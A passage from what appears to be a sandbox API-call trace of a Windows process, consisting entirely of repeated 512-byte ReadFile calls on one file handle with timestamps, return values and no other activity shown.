lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, 